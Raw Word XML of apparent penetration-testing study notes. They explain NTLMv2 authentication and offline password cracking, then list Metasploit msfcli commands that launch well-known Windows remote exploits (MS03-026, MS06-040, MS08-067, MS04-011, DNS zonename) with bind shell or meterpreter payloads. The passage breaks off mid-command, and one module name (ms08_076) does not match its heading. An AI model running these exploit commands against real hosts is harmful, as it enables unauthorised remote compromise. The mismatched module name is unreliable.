        <w:t xml:space="preserve">NTLMv2, introduced after Windows NT 4.0 SP4, is a challenge-response authentication protocol. It is intended as a cryptographically strengthened replacement for NTLMv1. It consists of two different protocols, one which differs greatly from NTLMv1, and a second which shares much of NTLMv1's structure and is similar to MS-CHAPv2. The first protocol is referred to as NTLM2, the second as NTLM2 Session. NTLM2 sends two 16-byte responses to an 8-byte server challenge. The response is the HMAC-MD5 hash of the server challenge, a randomly generated client challenge, and a HMAC-MD5 hash of the user's password and other identifying information. The two responses differ in the format of the client challenge. The shorter response uses an 8-byte random value for this challenge. In order to verify the response, the server must receive as part of the response the client challenge. For this shorter response, the 8-byte client challenge appended to the 16-byte response makes a 24-byte package which is consistent with the 24-byte response format of the previous NTLMv1 protocol. In certain non-official documentation (e.g. DCE/RPC </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Over</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB, Leighton) this response is termed LMv2. The second response sent by NTLM2 uses a variable length client challenge which includes (1) the current time in NT Time format, (2) an 8-byte random value, (3) the domain name and (4) some standard format stuff. The response must include a copy of this client challenge, and is therefore variable length. In non-official documentation, this response is termed NTv2.Both LMv2 and NTv2 hash the client and server challenge with a hash of the user's password and other identifying information. The exact formula is to begin with the NT Hash of NTLMv1, which is stored in the SAM, and continue to hash in, using HMAC-MD5, the username and domain name. In the box below, X stands for the fixed contents of a formatting field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008557B5" w:rsidRPr="008557B5" w:rsidRDefault="006D4F5A" w:rsidP="006D4F5A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The NTLMv2 Session protocol is entirely different, being very similar to MS-CHAPv2. It is described by Eric Glass' ntlm page. Briefly, the NTLMv1 algorithm is applied, except that an 8-byte client challenge is appended to the 8-byte server challenge and MD5 hashed. The least 8-byte half of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hash result</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the challenge utilized in the NTLMv1 protocol. The client challenge is returned in one 24-byte slot of the response message, the 24-byte calculated response is returned in the other slot. This is a strengthened form of NTLMv1 which maintains the ability to use existing Domain Controller infrastructure yet avoids a dictionary attack by a rogue server. For a fixed X, the server computes a table where location Y has value K such that Y=DES_K(X). Without the client participating in the choice of challenge, the server can send X, look up response Y in the table and get K. This attack can be made practical by using rainbow tables. However, existing NTLMv1 infrastructure allows that the challenge/response pair is not verified by the server, but sent to a Domain Controller for verification. Using NTLMv2 Session, this infrastructure continues to work if the server substitutes for the challenge the hash of the server and client challenges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">E4d - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Offline Password Analysis (rainbow tables / hash brute forcing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D4F5A" w:rsidRDefault="006D4F5A" w:rsidP="006D4F5A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If a system uses a poorly designed password hashing scheme to protect stored passwords, an attacker can exploit any weaknesses to recover even 'well-chosen' passwords. One example is the LM hash that Microsoft Windows XP and previous versions use by default to store user passwords of less than 15 characters in length. LM hash converts the password into all uppercase letters then breaks the password into two 7-character fields which are hashed separately—which allows each half to be attacked individually.</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> LM hash does not include salt, therefore a time-memory trade-off cryptanalysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00214A08">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack, such as rainbow tables, is also feasible. In 2003, Ophcrack, an implementation of the rainbow table technique, was published. It specifically targets the weaknesses of LM encryption, and includes pre-computed data sufficient to crack virtually all alphanumeric LM hashes in a few seconds. Many cracking tools, e.g. RainbowCrack, L0phtCrack and Cain, now incorporate similar attacks and make cracking of LM hashes trivial. However, because LM hashing is not used for passwords of 15 characters or longer, these are relatively strong.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D4F5A" w:rsidRPr="006D4F5A" w:rsidRDefault="006D4F5A" w:rsidP="006D4F5A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="006D4F5A" w:rsidP="006D4F5A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4F5A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Password encryption schemes that use stronger hash functions like MD5, SHA-512, SHA-1, and RIPEMD-160 can still be vulnerable to brute-force and precomputation attacks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The following types of password cracking can be applied to any hashing encryption scheme:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D4F5A" w:rsidRDefault="006D4F5A" w:rsidP="006D4F5A">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Dictionary attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D4F5A" w:rsidRPr="00AD5106" w:rsidRDefault="00180A26" w:rsidP="00AD5106">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, given and family names, any too short password (usually thought to be 6 or 7 characters or less), or any password meeting a too restrictive and so predictable, pattern (eg, alternating vowels and consonants). Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by sophisticated cracking programs armed with dictionaries and, perhaps, the user's personal information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00180A26" w:rsidRDefault="00180A26" w:rsidP="00AD5106">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Brute Force attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D4F5A" w:rsidRPr="00AD5106" w:rsidRDefault="00180A26" w:rsidP="00AD5106">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords. This method is unlikely to be practical unless the password is relatively </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>short,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> however techniques using parallel processing can reduce the time to find the password in inverse proportion to the number of computer devices (CPUs) in use. This depends heavily on whether the prospective attacker has access to the hash of the password as well as the hashing algorithm, in which case the attack is called an offline attack (it can be done without connection to the protected resource) or not, in which case it is called an online attack. Offline attack is generally much easier, because testing a password is reduced to a mathematical computation of the hash of the password to be tried and comparison with the hash of the real password. In an online attack the attacker has to try to authenticate himself with all the possible passwords, and rules and delays can be imposed by the system and the attempts can be logged.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5106" w:rsidRDefault="00AD5106" w:rsidP="00AD5106">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Pre</w:t>
      </w:r>
      <w:r w:rsidR="0020405F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>comp</w:t>
      </w:r>
      <w:r w:rsidR="00AD5106" w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>utation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0020405F" w:rsidRPr="0020405F" w:rsidRDefault="00AD5106" w:rsidP="0020405F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In its most basic form, pre</w:t>
      </w:r>
      <w:r w:rsidR="0020405F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>computation involves hashing each word in the dictionary (or any search space of candidate passwords) and storing the word and its computed hash in a way that enables lookup on the list of computed hashes. This way, when a new encrypted password is obtained, password recovery is instantaneous. Pre</w:t>
      </w:r>
      <w:r w:rsidR="0020405F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>computation can be very useful for a dictionary attack if salt is not used properly (see below), and the dramatic decrease in the cost of mass storage has made it practical for fairly large dictionaries. Advanced pre</w:t>
      </w:r>
      <w:r w:rsidR="0020405F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>computation methods exist that are even more effective. By applying a time-memory trade</w:t>
      </w:r>
      <w:r w:rsidR="0020405F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">off, a middle ground can be reached - a search space of size N can be turned into an encrypted database of size O(N2/3) in which searching for an encrypted password takes time O(N2/3). The theory has recently been refined into a practical technique. Another example cracks alphanumeric Windows LAN Manager </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a few seconds. This is much faster than brute force attacks on the obsolete LAN Manager, which uses a particularly weak method of hashing the password. Windows systems prior to Windows Vista/Server 2008 compute and store a LAN Manager hash by default for backwards compatibility. Rainbow tables are a form of pre</w:t>
      </w:r>
      <w:r w:rsidR="0020405F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>computation attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">E5 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Windows Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3D71" w:rsidRPr="00FA3D71" w:rsidRDefault="00FA3D71" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">E5a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA3D71">
        <w:t>Knowledge of remote windows vulnerabilities, particularly those for which robust exploit c</w:t>
      </w:r>
      <w:r>
        <w:t>ode exists in the public domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="00AD5106" w:rsidRDefault="009D6D8E" w:rsidP="00FA3D71">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD5106" w:rsidRPr="00AD5106" w:rsidRDefault="00AD5106" w:rsidP="00AD5106">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD5106">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5106" w:rsidRPr="00CC2019" w:rsidRDefault="00CC2019" w:rsidP="00CC2019">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ms06_040_netapi  (</w:t>
      </w:r>
      <w:r w:rsidR="00D930D1" w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>great</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2019" w:rsidRDefault="00CC2019" w:rsidP="00CC201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CC2019">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> wind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ows/smb/ms06_040_netapi RHOST=&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2019">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAYLOAD=windows/shell/bind_tcp TARGET=0 E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2019" w:rsidRPr="00CC2019" w:rsidRDefault="00CC2019" w:rsidP="00CC2019">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006023BF" w:rsidRPr="006023BF" w:rsidRDefault="006023BF"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windows/smb/msdns_zonename (</w:t>
      </w:r>
      <w:r w:rsidR="00AD5106" w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>good on DC's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5106" w:rsidRP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6023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit/windows/dcerpc/msdns_zonename PAYLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=windows/shell/bind_tcp RHOST=&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> E</w:t>
      </w:r>
      <w:r w:rsidR="00AD5106" w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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9D6D8E" w:rsidRPr="006023BF" w:rsidRDefault="006023BF"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windows/dcerpc/ms03_026_dcom (</w:t>
      </w:r>
      <w:r w:rsidR="00D930D1" w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>great</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>windo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ws/dcerpc/ms03_026_dcom RHOST=&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAYLOAD=windows/meterpreter/bind_tcp TARGET=0 E</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AD5106" w:rsidRPr="006023BF" w:rsidRDefault="00D930D1"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sidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>windows/smb/ms08_067_netapi</w:t>
      </w:r>
      <w:r w:rsidR="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>great</w:t>
      </w:r>
      <w:r w:rsidR="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006023BF" w:rsidRP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6023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> windo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ws/smb/ms08_076</w:t>
      </w:r>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>netapi</w:t>
      </w:r>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> RHOST=&lt;IP&gt; PAYLOAD=windows/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shell/</w:t>
      </w:r>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bind_tcp E</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D930D1" w:rsidRPr="006023BF" w:rsidRDefault="00D930D1"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sidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>windows/smb/ms04_011_lsa</w:t>
      </w:r>
      <w:r w:rsidR="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ss (</w:t>
      </w:r>
      <w:r w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>great</w:t>
      </w:r>
      <w:r w:rsidR="006023BF">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006023BF" w:rsidRPr="006023BF" w:rsidRDefault="00A17DBC"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msfcli</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006023BF" w:rsidRPr="006023BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
